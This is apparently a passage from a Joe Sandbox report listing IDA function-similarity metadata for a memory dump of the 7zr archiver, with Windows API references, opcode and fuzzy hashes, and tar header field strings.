                        • Opcode ID: 7201dc7563cb4239fa53bdd5f79b094b657e6d30ae68d1b551b8c6d601912286
                        • Instruction ID: 34aeb2853e292247ea48a204d3300e9529c9d7d0f845fa8ada68e771c9cebb80
                        • Opcode Fuzzy Hash: 7201dc7563cb4239fa53bdd5f79b094b657e6d30ae68d1b551b8c6d601912286
                        • Instruction Fuzzy Hash: 2FE09271A24A608BD316FB24D411BDDB7A8BF10304F00C45FE0A6D3282CFB87A08C7A5
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID:
                        • API String ID: 1795875747-0
                        • Opcode ID: 4319323eaf2377ee8556df0ee0510bd86f44c401b7e35c35c53364268024dcf4
                        • Instruction ID: 35c7e1a22d81000b5cffa5ae2bb891a3143049734f5fe0a52e2703c776535caf
                        • Opcode Fuzzy Hash: 4319323eaf2377ee8556df0ee0510bd86f44c401b7e35c35c53364268024dcf4
                        • Instruction Fuzzy Hash: 36D01232504119ABCF156B94DC46CDD77BCEF0C214700442AF541E2150EA75E515CB94
                        APIs
                        • __EH_prolog.LIBCMT ref: 003BF74A
                          • Part of subcall function 003BF784: __EH_prolog.LIBCMT ref: 003BF789
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 6419d0e981972bba3b95c592a5561a53072b7ac3f365245459ee4396405f9661
                        • Instruction ID: e0ef0aa5cdbcc73a24d823bbec833f59d352dab97986a46184121cb865d55968
                        • Opcode Fuzzy Hash: 6419d0e981972bba3b95c592a5561a53072b7ac3f365245459ee4396405f9661
                        • Instruction Fuzzy Hash: CAD01272A15214BFD7149B45EC13BEEB778EB40758F10456FF001A5141C7B9590086A4
                        APIs
                        • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,0038785F,00000000,00004000,00000000,00000002,?,?,?), ref: 00387B65
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 18b1791b1059e628a53120def4ea3ef4d6e9908f56c72a579a7ee67402c03812
                        • Instruction ID: 3fba28207082e6b782d1a3e1d4014519d9dd370a560eb4488853187293dd34fd
                        • Opcode Fuzzy Hash: 18b1791b1059e628a53120def4ea3ef4d6e9908f56c72a579a7ee67402c03812
                        • Instruction Fuzzy Hash: 2FE0EC75200208FBDF11CF90CC41F8E7BB9AF49754F208058E90596160C375AA64EF54
                        APIs
                        • __EH_prolog.LIBCMT ref: 003D80AF
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                          • Part of subcall function 003CBDB5: __EH_prolog.LIBCMT ref: 003CBDBA
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrowmalloc
                        • String ID:
                        • API String ID: 3744649731-0
                        • Opcode ID: 8e91d9132c1c7659e4762b6a059ed210e2e9f603e2b0c1f61c48c1801733f578
                        • Instruction ID: cbc3955c6bdd2dbe7ff9515c5a3266aef7b3aea3c959395a2f67cbde2fa4a539
                        • Opcode Fuzzy Hash: 8e91d9132c1c7659e4762b6a059ed210e2e9f603e2b0c1f61c48c1801733f578
                        • Instruction Fuzzy Hash: 9ED05E71B09201AFCB09FFB4A8267AEB2A4AB44704F00457EA016E7B81EF74AD018714
                        APIs
                        • FindClose.KERNELBASE(00000000,?,00386880), ref: 00386853
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CloseFind
                        • String ID:
                        • API String ID: 1863332320-0
                        • Opcode ID: 1e4db0939324da04a16202b3bddde001a1c6c1c92a595a3b404dac0ed865c9b3
                        • Instruction ID: 19c2509beddac384818335c4d395e14041b3c5cf289a5cff6a1d6c9dc8761e83
                        • Opcode Fuzzy Hash: 1e4db0939324da04a16202b3bddde001a1c6c1c92a595a3b404dac0ed865c9b3
                        • Instruction Fuzzy Hash: D7D01231104321468A746F7D784A9D533D86E063343220799F0B4C31E1D7608C835B90
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID:
                        • API String ID: 1795875747-0
                        • Opcode ID: c7d9f7908ddc1716f4c098abc4090a2d0560f42b55692f5a230d447bf65dd2e7
                        • Instruction ID: 56b77405e7ca0eb7b3028a50874de7b7e53a09f7cfb5c77c4955fb8bafae62bb
                        • Opcode Fuzzy Hash: c7d9f7908ddc1716f4c098abc4090a2d0560f42b55692f5a230d447bf65dd2e7
                        • Instruction Fuzzy Hash: 52D0C936108351AF96266F05EC0AC8BBBA5FFD9320721082FF480921609B626825DAA4
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputc
                        • String ID:
                        • API String ID: 1992160199-0
                        • Opcode ID: 525f3f1abf51ed9a59f0184580f4a194cac5041e6044434ed0c1c4d1b3f2c24e
                        • Instruction ID: 19dbb7dae6da255af3c9873a0e20239a274e5a4bbf9cfe6e1620797b4d782611
                        • Opcode Fuzzy Hash: 525f3f1abf51ed9a59f0184580f4a194cac5041e6044434ed0c1c4d1b3f2c24e
                        • Instruction Fuzzy Hash: DAB092323082209BE6281A9CBC0AAD46794DF09732B21006BF544C21909E911C928A99
                        APIs
                        • SetFileTime.KERNELBASE(?,?,?,?,00387C65,00000000,00000000,?,0038F238,?,?,?,?), ref: 00387C49
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: FileTime
                        • String ID:
                        • API String ID: 1425588814-0
                        • Opcode ID: 0b02cd97e66d10077b84625b5f4c2410f7fef5d065cef46b727bdd90a2cfffe0
                        • Instruction ID: 480a68ebc3f6f30759f7d9f75a7b8328d8923dd50bc91f9cc653b03896711896
                        • Opcode Fuzzy Hash: 0b02cd97e66d10077b84625b5f4c2410f7fef5d065cef46b727bdd90a2cfffe0
                        • Instruction Fuzzy Hash: 32C04C36258115FF8F120F70CC45C1EBBA2ABA5711F10C918F159C4070C7328034EF02
                        APIs
                        • SetEndOfFile.KERNELBASE(?,00387D81,?,?,?), ref: 00387D3E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: File
                        • String ID:
                        • API String ID: 749574446-0
                        • Opcode ID: 8711018a696474f337af69897df8dd432afe4073ddf8e6f893f801902dc1c1e6
                        • Instruction ID: 3f4c3e662008f7d3e9fc56a83c821833749f8250a5a28049c409cc3ebeae193e
                        • Opcode Fuzzy Hash: 8711018a696474f337af69897df8dd432afe4073ddf8e6f893f801902dc1c1e6
                        • Instruction Fuzzy Hash: 4AA001702E511A8A8E211B34D84A8283AA1AA526067A026A4A002CA4B5DB22442AAA45
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: f40501bdbba6b361c29d0d577733d48cdbc0352d8a0ee3e65f1ff89bbd0c2e1a
                        • Instruction ID: 91e4d8eb23aa132c4538aef04d5c3e3018a91ecdb98bae2050f1092840b1788d
                        • Opcode Fuzzy Hash: f40501bdbba6b361c29d0d577733d48cdbc0352d8a0ee3e65f1ff89bbd0c2e1a
                        • Instruction Fuzzy Hash: 2C817071D203499FCF16DFA8C480AEEBBB1EF48300F19A4A9E511B7241D770AA80CF60
                        APIs
                        • CloseHandle.KERNELBASE(00000000,00000000,00393D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393E12
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: 6479f7422fd35bbf0b56cd187096273bd99f5217a2b2a64edffc93f21638ec9f
                        • Instruction ID: 59d160fd3c48d67a0b47ab700b5f1234d22010cf59eb3fd0aa15f4326af10b0b
                        • Opcode Fuzzy Hash: 6479f7422fd35bbf0b56cd187096273bd99f5217a2b2a64edffc93f21638ec9f
                        • Instruction Fuzzy Hash: 1DD01272A1422147DF715E2CF8447E663DD6F10321B164459FC80CB144E764CCD35A94
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                        • Instruction ID: 0f1fd2fe9179a53a271c9a9cad9359070a5b202e24089dd524546e30ee12f090
                        • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                        • Instruction Fuzzy Hash: 77D0A7F022210501CF484530480966B30A41F4032AB18447EA823DA2C1E72CD229814C
                        APIs
                        • CloseHandle.KERNELBASE(00000000,?,003875AF,00000002,?,00000000,00000000), ref: 00387657
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: c73d61b4dd355a793185a6daebc692506f907fdb5012b96c35c97f18ab4da597
                        • Instruction ID: 619625c0cda0511f9dbbe268ebd90202de57655ade5f98092583e73b96c52491
                        • Opcode Fuzzy Hash: c73d61b4dd355a793185a6daebc692506f907fdb5012b96c35c97f18ab4da597
                        • Instruction Fuzzy Hash: 0AD01231108722468A746E3C78859D633D95B123343720799F4B0C32E1E360CC834B94
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000), ref: 00406B31
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 934381e2b7805f0f4d448580fd138ac4fb37786a73e6ec0e13fe52de8b6f6652
                        • Instruction ID: bad3f77accbae2bfcb2257f8ceebd6391e99fbcbc176226581fdbcf7b3288ee7
                        • Opcode Fuzzy Hash: 934381e2b7805f0f4d448580fd138ac4fb37786a73e6ec0e13fe52de8b6f6652
                        • Instruction Fuzzy Hash: 20C08CE1A4D280DFDF0213508C807603B209B83340F4A00C1E4046B092C2041809C722
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                        • Instruction ID: 96afedbe810c70e839991f1fb284284da6a7d0a9a620aebb08507842d455e9cb
                        • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                        • Instruction Fuzzy Hash: BEA024D551104001DD1C11313C014773001135030F7C004FF7407C0301F73DC11D100D
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                        • Instruction ID: 086cffe7298803ee6a8cb503cbd4ed32907a1c0bc0d7cd7ecd28ba5e1d4c2428
                        • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                        • Instruction Fuzzy Hash: B8A012CCF0000001DD0421353801463101322E06097D4C47D640650205FA2CC019300A
                        APIs
                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00406BAC
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: be1e4ceef6f94bc827c97f0bc5abed81a5248e04c0ef8d2bd7cf0e39a5b7abbf
                        • Instruction ID: 4532a003ad0c8034194a810d6ce292dc9825ebda9da479f94b8c5e1de9f0d6d5
                        • Opcode Fuzzy Hash: be1e4ceef6f94bc827c97f0bc5abed81a5248e04c0ef8d2bd7cf0e39a5b7abbf
                        • Instruction Fuzzy Hash: 28A00278780700B7ED7067706D8FF5D37247781F85F7085547241690D05AE470459A9C
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                        • Instruction ID: e140d91b5295ffa86839e2a65cf0b07b7d80e408da6d8e0ed208c45c8d6895e1
                        • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                        • Instruction Fuzzy Hash:
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                        • Instruction ID: 07d3041654f5c1833beaab89fdf72379797f597ff6c3ccf2217ec8015dd9603f
                        • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                        • Instruction Fuzzy Hash:
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: bf55a95486b6e0b352802f35c95a06fa13cc5fbd619d14d6992fd8cfba245900
                        • Instruction ID: 6b11c3e2cc32fab11d369c6b7a762d5d7867d8d5ac2ba2fb4dfb086df26bf100
                        • Opcode Fuzzy Hash: bf55a95486b6e0b352802f35c95a06fa13cc5fbd619d14d6992fd8cfba245900
                        • Instruction Fuzzy Hash: B5A00271505201DBDA151B10ED4A49D7B61EF85627B714469F057504718B714871BE05
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: Version
                        • String ID:
                        • API String ID: 1889659487-0
                        • Opcode ID: 3364fb6b00a90d02ce02b40b609f52240f24645f4c8065c64f9465ea7dd75dd6
                        • Instruction ID: 2a4c0e554819d85f3723140be638ce000d4d56dced303d4f7179c566fbe2c885
                        • Opcode Fuzzy Hash: 3364fb6b00a90d02ce02b40b609f52240f24645f4c8065c64f9465ea7dd75dd6
                        • Instruction Fuzzy Hash: AAD01272A1181547E700B72CE80625A77E1FB61304FC80959D865C1157F97DCA56829A
                        APIs
                        • __EH_prolog.LIBCMT ref: 003E07B8
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                          • Part of subcall function 0038297F: memcpy.MSVCRT(?,?,?,?,?,003A50A5,?,?), ref: 003829B2
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologfreememcpy
                        • String ID: @PathCut/_pc_$L$PaxHeader/@PaxHeader$atime$crc32/$ctime$devmajor$devminor$gid$gname$linkpath$mtime$path$root$size$uid$uname
                        • API String ID: 2037215848-4204487407
                        • Opcode ID: 60032136c4f6dd1f8d1b3ee78ce8b33a168a5040092594074be3ee208b05119f
                        • Instruction ID: ac0a7642fcc0f9c0a78157de137ead9793c45b2cf05bc0cf717f9cb9fcf40049
                        • Opcode Fuzzy Hash: 60032136c4f6dd1f8d1b3ee78ce8b33a168a5040092594074be3ee208b05119f
                        • Instruction Fuzzy Hash: 4D02D270900299DFDB2ADF55C990AEEBBB5BF14300F5442AED045B7292D7B0AEC5CB50
                        APIs
                        • memcmp.MSVCRT(?,004348A0,00000010), ref: 0038C09E
                        • memcmp.MSVCRT(?,00430258,00000010), ref: 0038C0BB
                        • memcmp.MSVCRT(?,00430348,00000010), ref: 0038C0CE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
